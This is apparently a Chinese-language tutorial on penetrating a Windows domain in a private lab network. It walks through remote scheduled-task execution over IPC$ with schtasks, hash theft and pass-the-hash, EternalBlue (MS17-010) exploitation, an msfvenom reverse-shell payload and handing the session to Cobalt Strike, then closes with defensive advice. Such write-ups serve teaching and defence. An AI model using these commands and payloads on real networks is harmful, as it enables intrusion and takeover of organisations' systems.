域渗透实战教学文档<\/h1>

初始环境评估<\/h2>

杀软检查<\/strong>：目标机器无杀毒软件防护<\/li>
域环境检查<\/strong>：当前机器不在域环境中<\/li>

密码抓取<\/strong>：尝试获取本地administrator密码，但未成功<\/li> <\/ol>
渗透思路分析<\/h2>
情况1：机器能出网<\/h3>

直接使用Cobalt Strike(CS)上线<\/li>
抓取本地管理员密码<\/li>
横向移动尝试撞库<\/li>
获取域账号后尝试攻击域机器<\/li>
逐步扩大控制范围直至获取域控权限<\/li> <\/ul>
情况2：机器不能出网（本案例情况）<\/h3>

检查其他协议连通性（如DNS）<\/li>
利用IPC$连接进行横向移动<\/li>
通过计划任务执行payload<\/li>
检查已有net use连接<\/li>
逐个尝试IPC$连接<\/li> <\/ul>
具体攻击步骤<\/h2>
1. 通过计划任务上线<\/h3>
# 1. 创建批处理文件 <\/span><\/span>whoami >> c:\aa\1.txt <\/span><\/span>ipconfig >> c:\aa\1.txt <\/span><\/span>netstat -ano >> c:\aa\1.txt <\/span><\/span> <\/span><\/span># 2. 复制到目标机器 <\/span><\/span>copy<\/span> 1.bat \\192.168.160.139\C$\windows\temp <\/span><\/span> <\/span><\/span># 3. 创建并执行计划任务 <\/span><\/span>schtasks \/create \/tn task1 \/s 192.168.160.139 \/tr C:\aa\1.bat \/sc ONSTART \/RU system \/f <\/span><\/span>schtasks \/run \/tn task1 \/s 192.168.160.139 \/i <\/span><\/span>schtasks \/f \/delete \/tn task1 \/s 192.168.160.139 <\/span><\/span><\/code><\/pre>2. 数据库密码挖掘<\/h3> 发现目标开放1521端口(Oracle)<\/li> 尝试获取Oracle数据库凭证<\/li> <\/ul> 3. 横向移动<\/h3> 成功控制192.168.160.88机器<\/li> 抓取密码哈希<\/li> 尝试Pass-the-Hash(PTH)攻击但失败<\/li> <\/ul> 4. MS17-010漏洞利用<\/h3> 使用socks代理扫描C段<\/li> 发现多台存在漏洞的机器<\/li> 使用原生Python脚本攻击192.168.160.111<\/li> <\/ul> # 生成payload<\/span> <\/span><\/span>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span> LPORT=<\/span>12399<\/span> -f dll > axgg.dll <\/span><\/span><\/code><\/pre>5. 权限提升与域渗透<\/h3> 成功获取meterpreter会话<\/li> 发现目标为FTP服务器<\/li> 抓取哈希后发现是域机器<\/li> 将meterpreter会话迁移到CS<\/li> 成功获取域管理员权限<\/li> <\/ul> 技术要点总结<\/h2> 计划任务利用<\/strong>：通过schtasks命令在远程机器上创建任务执行payload<\/li> 哈希传递(PTH)<\/strong>：尝试使用获取的哈希进行横向移动<\/li> 永恒之蓝利用<\/strong>：对存在MS17-010漏洞的机器进行攻击<\/li> 会话迁移<\/strong>：将meterpreter会话迁移到Cobalt Strike<\/li> 域权限提升<\/strong>：通过获取的域管理员凭证控制域控服务器<\/li> <\/ol> 防御建议<\/h2> 网络隔离<\/strong>：限制不必要的IPC$共享和SMB访问<\/li> 补丁管理<\/strong>：及时修复如MS17-010等高危漏洞<\/li> 权限控制<\/strong>：避免使用相同密码或哈希的工作组\/域账户<\/li> 日志监控<\/strong>：监控异常的计划任务创建和远程执行行为<\/li> 杀毒软件<\/strong>：部署终端防护软件检测恶意行为<\/li> <\/ol> 工具清单<\/h2> Cobalt Strike (CS)：C2框架<\/li> Metasploit Framework：漏洞利用和payload生成<\/li> 原生Python脚本：针对MS17-010的利用<\/li> 计划任务(schtasks)：远程代码执行<\/li> IPC$共享：横向移动通道<\/li> <\/ul>